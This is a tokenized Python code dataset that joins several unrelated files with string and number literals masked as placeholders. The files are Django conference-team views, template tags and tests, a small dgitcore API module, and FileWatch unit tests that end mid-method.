TeamSignupForm <EOL> from . hooks import hookset <EOL> from . models import Team , Membership <EOL> MESSAGE_STRINGS = hookset . get_message_strings ( ) <EOL> class TeamSignupView ( SignupView ) : <EOL> template_name = "<STR_LIT>" <EOL> def get_form_class ( self ) : <EOL> if self . signup_code : <EOL> return self . form_class <EOL> return TeamSignupForm <EOL> def after_signup ( self , form ) : <EOL> if not self . signup_code : <EOL> self . created_user . teams_created . create ( <EOL> name = form . cleaned_data [ "<STR_LIT>" ] <EOL> ) <EOL> super ( TeamSignupView , self ) . after_signup ( form ) <EOL> class TeamCreateView ( LoginRequiredMixin , CreateView ) : <EOL> form_class = TeamForm <EOL> model = Team <EOL> def form_valid ( self , form ) : <EOL> self . object = form . save ( commit = False ) <EOL> self . object . creator = self . request . user <EOL> self . object . save ( ) <EOL> return HttpResponseRedirect ( self . 
get_success_url ( ) ) <EOL> class TeamListView ( ListView ) : <EOL> model = Team <EOL> context_object_name = "<STR_LIT>" <EOL> @ team_required <EOL> @ login_required <EOL> def team_update ( request ) : <EOL> team = request . team <EOL> if not team . is_owner_or_manager ( request . user ) : <EOL> return HttpResponseForbidden ( ) <EOL> if request . method == "<STR_LIT:POST>" : <EOL> form = TeamForm ( request . POST , instance = team ) <EOL> if form . is_valid ( ) : <EOL> form . save ( ) <EOL> return redirect ( team . get_absolute_url ( ) ) <EOL> else : <EOL> form = TeamForm ( instance = team ) <EOL> return render ( request , "<STR_LIT>" , { "<STR_LIT>" : form , "<STR_LIT>" : team } ) <EOL> @ team_required <EOL> @ login_required <EOL> def team_detail ( request ) : <EOL> team = request . team <EOL> state = team . state_for ( request . user ) <EOL> role = team . role_for ( request . user ) <EOL> if team . member_access == Team . MEMBER_ACCESS_INVITATION and state is None : <EOL> raise Http404 ( ) <EOL> return render ( request , "<STR_LIT>" , { <EOL> "<STR_LIT>" : team , <EOL> "<STR_LIT:state>" : state , <EOL> "<STR_LIT>" : role , <EOL> "<STR_LIT>" : TeamInviteUserForm ( team = team ) , <EOL> "<STR_LIT>" : team . can_join ( request . user ) , <EOL> "<STR_LIT>" : team . can_leave ( request . user ) , <EOL> "<STR_LIT>" : team . can_apply ( request . user ) , <EOL> } ) <EOL> class TeamManageView ( TemplateView ) : <EOL> template_name = "<STR_LIT>" <EOL> @ method_decorator ( manager_required ) <EOL> def dispatch ( self , * args , ** kwargs ) : <EOL> self . team = self . request . team <EOL> self . role = self . team . role_for ( self . request . user ) <EOL> return super ( TeamManageView , self ) . dispatch ( * args , ** kwargs ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> ctx = super ( TeamManageView , self ) . get_context_data ( ** kwargs ) <EOL> ctx . update ( { <EOL> "<STR_LIT>" : self . team , <EOL> "<STR_LIT>" : self . role , <EOL> "<STR_LIT>" : self . 
get_team_invite_form ( ) , <EOL> "<STR_LIT>" : self . team . can_join ( self . request . user ) , <EOL> "<STR_LIT>" : self . team . can_leave ( self . request . user ) , <EOL> "<STR_LIT>" : self . team . can_apply ( self . request . user ) , <EOL> } ) <EOL> return ctx <EOL> def get_team_invite_form ( self ) : <EOL> return TeamInviteUserForm ( team = self . team ) <EOL> @ team_required <EOL> @ login_required <EOL> def team_join ( request ) : <EOL> team = request . team <EOL> state = team . state_for ( request . user ) <EOL> if team . manager_access == Team . MEMBER_ACCESS_INVITATION and state is None and not request . user . is_staff : <EOL> raise Http404 ( ) <EOL> if team . can_join ( request . user ) and request . method == "<STR_LIT:POST>" : <EOL> membership , created = Membership . objects . get_or_create ( team = team , user = request . user ) <EOL> membership . role = Membership . ROLE_MEMBER <EOL> membership . state = Membership . STATE_AUTO_JOINED <EOL> membership . save ( ) <EOL> messages . success ( request , MESSAGE_STRINGS [ "<STR_LIT>" ] ) <EOL> return redirect ( "<STR_LIT>" , slug = team . slug ) <EOL> @ team_required <EOL> @ login_required <EOL> def team_leave ( request ) : <EOL> team = request . team <EOL> state = team . state_for ( request . user ) <EOL> if team . manager_access == Team . MEMBER_ACCESS_INVITATION and state is None and not request . user . is_staff : <EOL> raise Http404 ( ) <EOL> if team . can_leave ( request . user ) and request . method == "<STR_LIT:POST>" : <EOL> membership = Membership . objects . get ( team = team , user = request . user ) <EOL> membership . delete ( ) <EOL> messages . success ( request , MESSAGE_STRINGS [ "<STR_LIT>" ] ) <EOL> return redirect ( "<STR_LIT>" ) <EOL> else : <EOL> return redirect ( "<STR_LIT>" , slug = team . slug ) <EOL> @ team_required <EOL> @ login_required <EOL> def team_apply ( request ) : <EOL> team = request . team <EOL> state = team . state_for ( request . user ) <EOL> if team . 
manager_access == Team . MEMBER_ACCESS_INVITATION and state is None and not request . user . is_staff : <EOL> raise Http404 ( ) <EOL> if team . can_apply ( request . user ) and request . method == "<STR_LIT:POST>" : <EOL> membership , created = Membership . objects . get_or_create ( team = team , user = request . user ) <EOL> membership . state = Membership . STATE_APPLIED <EOL> membership . save ( ) <EOL> messages . success ( request , MESSAGE_STRINGS [ "<STR_LIT>" ] ) <EOL> return redirect ( "<STR_LIT>" , slug = team . slug ) <EOL> @ login_required <EOL> @ require_POST <EOL> def team_accept ( request , pk ) : <EOL> membership = get_object_or_404 ( Membership , pk = pk ) <EOL> if membership . accept ( by = request . user ) : <EOL> messages . success ( request , MESSAGE_STRINGS [ "<STR_LIT>" ] ) <EOL> return redirect ( "<STR_LIT>" , slug = membership . team . slug ) <EOL> @ login_required <EOL> @ require_POST <EOL> def team_reject ( request , pk ) : <EOL> membership = get_object_or_404 ( Membership , pk = pk ) <EOL> if membership . reject ( by = request . user ) : <EOL> messages . success ( request , MESSAGE_STRINGS [ "<STR_LIT>" ] ) <EOL> return redirect ( "<STR_LIT>" , slug = membership . team . slug ) <EOL> class TeamInviteView ( FormView ) : <EOL> http_method_names = [ "<STR_LIT>" ] <EOL> form_class = TeamInviteUserForm <EOL> @ method_decorator ( manager_required ) <EOL> def dispatch ( self , * args , ** kwargs ) : <EOL> self . team = self . request . team <EOL> return super ( TeamInviteView , self ) . dispatch ( * args , ** kwargs ) <EOL> def get_form_kwargs ( self ) : <EOL> form_kwargs = super ( TeamInviteView , self ) . get_form_kwargs ( ) <EOL> form_kwargs . update ( { "<STR_LIT>" : self . team } ) <EOL> return form_kwargs <EOL> def get_unbound_form ( self ) : <EOL> """<STR_LIT>""" <EOL> form_kwargs = self . get_form_kwargs ( ) <EOL> bound_fields = [ "<STR_LIT:data>" , "<STR_LIT>" ] <EOL> for field in bound_fields : <EOL> form_kwargs . 
pop ( field , None ) <EOL> return self . get_form_class ( ) ( ** form_kwargs ) <EOL> def after_membership_added ( self , form ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def get_form_success_data ( self , form ) : <EOL> """<STR_LIT>""" <EOL> data = { <EOL> "<STR_LIT:html>" : render_to_string ( <EOL> "<STR_LIT>" , <EOL> { <EOL> "<STR_LIT>" : self . get_unbound_form ( ) , <EOL> "<STR_LIT>" : self . team <EOL> } , <EOL> context_instance = RequestContext ( self . request ) <EOL> ) <EOL> } <EOL> membership = self . membership <EOL> if membership is not None : <EOL> if membership . state == Membership . STATE_APPLIED : <EOL> fragment_class = "<STR_LIT>" <EOL> elif membership . state == Membership . STATE_INVITED : <EOL> fragment_class = "<STR_LIT>" <EOL> elif membership . state in ( Membership . STATE_AUTO_JOINED , Membership . STATE_ACCEPTED ) : <EOL> fragment_class = { <EOL> Membership . ROLE_OWNER : "<STR_LIT>" , <EOL> Membership . ROLE_MANAGER : "<STR_LIT>" , <EOL> Membership . ROLE_MEMBER : "<STR_LIT>" <EOL> } [ membership . role ] <EOL> data . update ( { <EOL> "<STR_LIT>" : { <EOL> fragment_class : render_to_string ( <EOL> "<STR_LIT>" , <EOL> { <EOL> "<STR_LIT>" : membership , <EOL> "<STR_LIT>" : self . team <EOL> } , <EOL> context_instance = RequestContext ( self . request ) <EOL> ) <EOL> } <EOL> } ) <EOL> return data <EOL> def form_valid ( self , form ) : <EOL> user_or_email = form . cleaned_data [ "<STR_LIT>" ] <EOL> role = form . cleaned_data [ "<STR_LIT>" ] <EOL> if isinstance ( user_or_email , string_types ) : <EOL> self . membership = self . team . invite_user ( self . request . user , user_or_email , role ) <EOL> else : <EOL> self . membership = self . team . add_user ( user_or_email , role , by = self . request . user ) <EOL> self . after_membership_added ( form ) <EOL> data = self . get_form_success_data ( form ) <EOL> return self . 
render_to_response ( data ) <EOL> def form_invalid ( self , form ) : <EOL> data = { <EOL> "<STR_LIT:html>" : render_to_string ( "<STR_LIT>" , { <EOL> "<STR_LIT>" : form , <EOL> "<STR_LIT>" : self . team <EOL> } , context_instance = RequestContext ( self . request ) ) <EOL> } <EOL> return self . render_to_response ( data ) <EOL> def render_to_response ( self , context , ** response_kwargs ) : <EOL> return JsonResponse ( context ) <EOL> @ manager_required <EOL> @ require_POST <EOL> def team_member_revoke_invite ( request , pk ) : <EOL> membership = get_object_or_404 ( request . team . memberships . all ( ) , pk = pk ) <EOL> membership . remove ( by = request . user ) <EOL> data = { <EOL> "<STR_LIT:html>" : "<STR_LIT>" <EOL> } <EOL> return HttpResponse ( json . dumps ( data ) , content_type = "<STR_LIT:application/json>" ) <EOL> @ manager_required <EOL> @ require_POST <EOL> def team_member_resend_invite ( request , pk ) : <EOL> membership = get_object_or_404 ( request . team . memberships . all ( ) , pk = pk ) <EOL> membership . resend_invite ( by = request . user ) <EOL> data = { <EOL> "<STR_LIT:html>" : render_to_string ( <EOL> "<STR_LIT>" , <EOL> { <EOL> "<STR_LIT>" : membership , <EOL> "<STR_LIT>" : request . team <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> } <EOL> return HttpResponse ( json . dumps ( data ) , content_type = "<STR_LIT:application/json>" ) <EOL> @ manager_required <EOL> @ require_POST <EOL> def team_member_promote ( request , pk ) : <EOL> membership = get_object_or_404 ( request . team . memberships . all ( ) , pk = pk ) <EOL> membership . promote ( by = request . user ) <EOL> data = { <EOL> "<STR_LIT:html>" : render_to_string ( <EOL> "<STR_LIT>" , <EOL> { <EOL> "<STR_LIT>" : membership , <EOL> "<STR_LIT>" : request . team <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> } <EOL> return HttpResponse ( json . 
dumps ( data ) , content_type = "<STR_LIT:application/json>" ) <EOL> @ manager_required <EOL> @ require_POST <EOL> def team_member_demote ( request , pk ) : <EOL> membership = get_object_or_404 ( request . team . memberships . all ( ) , pk = pk ) <EOL> membership . demote ( by = request . user ) <EOL> data = { <EOL> "<STR_LIT:html>" : render_to_string ( <EOL> "<STR_LIT>" , <EOL> { <EOL> "<STR_LIT>" : membership , <EOL> "<STR_LIT>" : request . team <EOL> } , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> } <EOL> return HttpResponse ( json . dumps ( data ) , content_type = "<STR_LIT:application/json>" ) <EOL> @ manager_required <EOL> @ require_POST <EOL> def team_member_remove ( request , pk ) : <EOL> membership = get_object_or_404 ( request . team . memberships . all ( ) , pk = pk ) <EOL> membership . remove ( by = request . user ) <EOL> data = { <EOL> "<STR_LIT:html>" : "<STR_LIT>" <EOL> } <EOL> return HttpResponse ( json . dumps ( data ) , content_type = "<STR_LIT:application/json>" ) <EOL> @ team_required <EOL> @ login_required <EOL> def autocomplete_users ( request ) : <EOL> team = request . team <EOL> role = team . role_for ( request . user ) <EOL> if role not in [ Membership . ROLE_MANAGER , Membership . ROLE_OWNER ] : <EOL> raise Http404 ( ) <EOL> User = get_user_model ( ) <EOL> users = User . objects . exclude ( pk__in = [ <EOL> x . user . pk for x in team . memberships . exclude ( user__isnull = True ) <EOL> ] ) <EOL> q = request . GET . get ( "<STR_LIT>" ) <EOL> results = [ ] <EOL> if q : <EOL> results . extend ( [ <EOL> hookset . get_autocomplete_result ( x ) <EOL> for x in hookset . search_queryset ( q , users ) <EOL> ] ) <EOL> return HttpResponse ( json . dumps ( results ) , content_type = "<STR_LIT:application/json>" ) </s>
<s> from django import template <EOL> from symposion . proposals . models import AdditionalSpeaker <EOL> register = template . Library ( ) <EOL> class AssociatedProposalsNode ( template . Node ) : <EOL> @ classmethod <EOL> def handle_token ( cls , parser , token ) : <EOL> bits = token . split_contents ( ) <EOL> if len ( bits ) == <NUM_LIT:3> and bits [ <NUM_LIT:1> ] == "<STR_LIT>" : <EOL> return cls ( bits [ <NUM_LIT:2> ] ) <EOL> else : <EOL> raise template . TemplateSyntaxError ( "<STR_LIT>" % bits [ <NUM_LIT:0> ] ) <EOL> def __init__ ( self , context_var ) : <EOL> self . context_var = context_var <EOL> def render ( self , context ) : <EOL> request = context [ "<STR_LIT>" ] <EOL> if request . user . speaker_profile : <EOL> pending = AdditionalSpeaker . SPEAKING_STATUS_ACCEPTED <EOL> speaker = request . user . speaker_profile <EOL> queryset = AdditionalSpeaker . objects . filter ( speaker = speaker , status = pending ) <EOL> context [ self . context_var ] = [ item . proposalbase for item in queryset ] <EOL> else : <EOL> context [ self . context_var ] = None <EOL> return u"<STR_LIT>" <EOL> class PendingProposalsNode ( template . Node ) : <EOL> @ classmethod <EOL> def handle_token ( cls , parser , token ) : <EOL> bits = token . split_contents ( ) <EOL> if len ( bits ) == <NUM_LIT:3> and bits [ <NUM_LIT:1> ] == "<STR_LIT>" : <EOL> return cls ( bits [ <NUM_LIT:2> ] ) <EOL> else : <EOL> raise template . TemplateSyntaxError ( "<STR_LIT>" % bits [ <NUM_LIT:0> ] ) <EOL> def __init__ ( self , context_var ) : <EOL> self . context_var = context_var <EOL> def render ( self , context ) : <EOL> request = context [ "<STR_LIT>" ] <EOL> if request . user . speaker_profile : <EOL> pending = AdditionalSpeaker . SPEAKING_STATUS_PENDING <EOL> speaker = request . user . speaker_profile <EOL> queryset = AdditionalSpeaker . objects . filter ( speaker = speaker , status = pending ) <EOL> context [ self . context_var ] = [ item . 
proposalbase for item in queryset ] <EOL> else : <EOL> context [ self . context_var ] = None <EOL> return u"<STR_LIT>" <EOL> @ register . tag <EOL> def pending_proposals ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> return PendingProposalsNode . handle_token ( parser , token ) <EOL> @ register . tag <EOL> def associated_proposals ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> return AssociatedProposalsNode . handle_token ( parser , token ) </s>
<s> from datetime import date <EOL> from django . conf import settings <EOL> from django . contrib . auth . models import User <EOL> from django . core . urlresolvers import reverse <EOL> from django . test import TestCase <EOL> from symposion . conference . models import Section , current_conference , Conference <EOL> from symposion . schedule . models import Day , Schedule , Session <EOL> class TestScheduleViews ( TestCase ) : <EOL> username = "<STR_LIT>" <EOL> first_name = "<STR_LIT>" <EOL> last_name = "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> self . user = User . objects . create_user ( self . username , <EOL> password = "<STR_LIT>" , <EOL> email = self . username ) <EOL> self . user . first_name = self . first_name <EOL> self . user . last_name = self . last_name <EOL> self . user . save ( ) <EOL> def test_session_list ( self ) : <EOL> rsp = self . client . get ( reverse ( "<STR_LIT>" ) ) <EOL> self . assertEqual ( <NUM_LIT:200> , rsp . status_code ) <EOL> def test_session_staff_email ( self ) : <EOL> self . user . is_staff = True <EOL> self . user . save ( ) <EOL> assert self . client . login ( username = self . username , password = "<STR_LIT>" ) <EOL> url = reverse ( "<STR_LIT>" ) <EOL> rsp = self . client . get ( url ) <EOL> self . assertEqual ( <NUM_LIT:200> , rsp . status_code ) <EOL> def test_session_detail ( self ) : <EOL> Conference . objects . get_or_create ( id = settings . CONFERENCE_ID ) <EOL> section = Section . objects . create ( <EOL> conference = current_conference ( ) , <EOL> ) <EOL> schedule = Schedule . objects . create ( <EOL> section = section , <EOL> ) <EOL> day = Day . objects . create ( <EOL> schedule = schedule , <EOL> date = date . today ( ) , <EOL> ) <EOL> session = Session . objects . create ( <EOL> day = day , <EOL> ) <EOL> url = reverse ( "<STR_LIT>" , args = ( session . pk , ) ) <EOL> rsp = self . client . get ( url ) <EOL> self . assertEqual ( <NUM_LIT:200> , rsp . status_code ) </s>
<s> from django . contrib import admin <EOL> from reversion . admin import VersionAdmin <EOL> from symposion . teams . models import Team , Membership <EOL> admin . site . register ( Team , <EOL> prepopulated_fields = { "<STR_LIT>" : ( "<STR_LIT:name>" , ) } ) <EOL> class MembershipAdmin ( VersionAdmin ) : <EOL> list_display = [ "<STR_LIT>" , "<STR_LIT:user>" , "<STR_LIT:state>" ] <EOL> list_filter = [ "<STR_LIT>" ] <EOL> search_fields = [ "<STR_LIT>" ] <EOL> admin . site . register ( Membership , MembershipAdmin ) </s>
<s> import os , sys <EOL> import dgitcore <EOL> from dgitcore import datasets , plugins , config <EOL> from dgitcore . config import get_config <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def api_call_action ( func ) : <EOL> """<STR_LIT>""" <EOL> def _inner ( * args , ** kwargs ) : <EOL> return func ( * args , ** kwargs ) <EOL> _inner . __name__ = func . __name__ <EOL> _inner . __doc__ = func . __doc__ <EOL> return _inner <EOL> def _reexport ( mod ) : <EOL> __all__ . extend ( mod . __all__ ) <EOL> for var in mod . __all__ : <EOL> base = getattr ( mod , var ) <EOL> f = api_call_action ( base ) <EOL> globals ( ) [ var ] = f <EOL> def initialize ( ) : <EOL> plugins . plugins_load ( ) <EOL> config . init ( ) <EOL> _reexport ( datasets ) <EOL> _reexport ( plugins ) </s>
<s> import os , sys <EOL> import json <EOL> from collections import namedtuple <EOL> import requests <EOL> Key = namedtuple ( "<STR_LIT>" , [ "<STR_LIT:name>" , "<STR_LIT:version>" ] ) <EOL> class TransformerBase ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , version , description , supported = [ ] ) : <EOL> """<STR_LIT>""" <EOL> self . enable = '<STR_LIT:y>' <EOL> self . name = name <EOL> self . version = version <EOL> self . description = description <EOL> self . support = supported + [ name ] <EOL> self . initialize ( ) <EOL> def initialize ( self ) : <EOL> """<STR_LIT>""" <EOL> return <EOL> def autooptions ( self ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def evaluate ( self , repo , spec , force , args ) : <EOL> """<STR_LIT>""" <EOL> return [ ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import tempfile <EOL> import time <EOL> from unittest import TestCase <EOL> from kingpin . kazoo_utils . file_watch import FileWatch <EOL> class FileWatchTestCase ( TestCase ) : <EOL> def test_add_config_monitor ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data = [ <NUM_LIT:0> , None , None ] <EOL> def on_change ( value , stat ) : <EOL> test_data [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data [ <NUM_LIT:1> ] = value <EOL> test_data [ <NUM_LIT:2> ] = stat . version <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , "<STR_LIT>" ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:2> ] , os . path . getmtime ( tmp_file ) ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_add_serverset_monitor ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data = [ <NUM_LIT:0> , None ] <EOL> def on_change ( children ) : <EOL> test_data [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data [ <NUM_LIT:1> ] = children <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change , watch_type = '<STR_LIT>' ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , [ ] ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_config_change ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . 
mkstemp ( ) <EOL> test_data = [ <NUM_LIT:0> , None , None ] <EOL> def on_change ( value , stat ) : <EOL> test_data [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data [ <NUM_LIT:1> ] = value <EOL> test_data [ <NUM_LIT:2> ] = stat . version <EOL> new_content = "<STR_LIT:hello>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , new_content ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:2> ] , os . path . getmtime ( tmp_file ) ) <EOL> watch . _check_file_updates ( ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , new_content ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:2> ] , os . path . getmtime ( tmp_file ) ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_serverset_change ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data = [ <NUM_LIT:0> , None ] <EOL> def on_change ( value ) : <EOL> test_data [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data [ <NUM_LIT:1> ] = value <EOL> new_content = "<STR_LIT:hello>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change , watch_type = '<STR_LIT>' ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> time . 
sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , [ new_content ] ) <EOL> watch . _check_file_updates ( ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , [ new_content ] ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_config_content_not_change ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data = [ <NUM_LIT:0> , None , None ] <EOL> def on_change ( value , stat ) : <EOL> test_data [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data [ <NUM_LIT:1> ] = value <EOL> test_data [ <NUM_LIT:2> ] = stat . version <EOL> new_content = "<STR_LIT:hello>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> old_update_time = os . path . getmtime ( tmp_file ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , new_content ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:2> ] , old_update_time ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> new_update_time = os . path . getmtime ( tmp_file ) <EOL> self . 
assertNotEqual ( old_update_time , new_update_time ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , new_content ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:2> ] , old_update_time ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_serverset_content_not_change ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data = [ <NUM_LIT:0> , None ] <EOL> def on_change ( value ) : <EOL> test_data [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data [ <NUM_LIT:1> ] = value <EOL> new_content = "<STR_LIT:hello>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change , watch_type = '<STR_LIT>' ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> old_update_time = os . path . getmtime ( tmp_file ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , [ new_content ] ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> f = open ( tmp_file , '<STR_LIT:w>' ) <EOL> f . write ( new_content ) <EOL> f . close ( ) <EOL> new_update_time = os . path . getmtime ( tmp_file ) <EOL> self . assertNotEqual ( old_update_time , new_update_time ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , <NUM_LIT:2> ) <EOL> self . 
assertEqual ( test_data [ <NUM_LIT:1> ] , [ new_content ] ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_multiple_config_changes ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data = [ <NUM_LIT:0> , None , None ] <EOL> def on_change ( value , stat ) : <EOL> test_data [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data [ <NUM_LIT:1> ] = value <EOL> test_data [ <NUM_LIT:2> ] = stat . version <EOL> new_content = "<STR_LIT:hello>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . add_watch ( tmp_file , on_change ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> times = <NUM_LIT:3> <EOL> expected_content = "<STR_LIT>" <EOL> for i in range ( times ) : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> new_line = new_content + str ( i ) + '<STR_LIT:\n>' <EOL> f = open ( tmp_file , '<STR_LIT:a>' ) <EOL> f . write ( new_line ) <EOL> f . close ( ) <EOL> watch . _check_file_updates ( ) <EOL> self . _validate_internal_map ( watch , tmp_file , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> expected_content += new_line <EOL> self . assertEqual ( test_data [ <NUM_LIT:0> ] , i + <NUM_LIT:2> ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:1> ] , expected_content ) <EOL> self . assertEqual ( test_data [ <NUM_LIT:2> ] , os . path . getmtime ( tmp_file ) ) <EOL> del watch <EOL> os . remove ( tmp_file ) <EOL> def test_multiple_serverset_changes ( self ) : <EOL> """<STR_LIT>""" <EOL> fd , tmp_file = tempfile . mkstemp ( ) <EOL> test_data = [ <NUM_LIT:0> , None ] <EOL> def on_change ( value ) : <EOL> test_data [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> test_data [ <NUM_LIT:1> ] = value <EOL> new_content = "<STR_LIT:hello>" <EOL> watch = FileWatch ( polling = False ) <EOL> watch . _clear_all_watches ( ) <EOL> self . _validate_empty_internal_map ( watch ) <EOL> watch . 
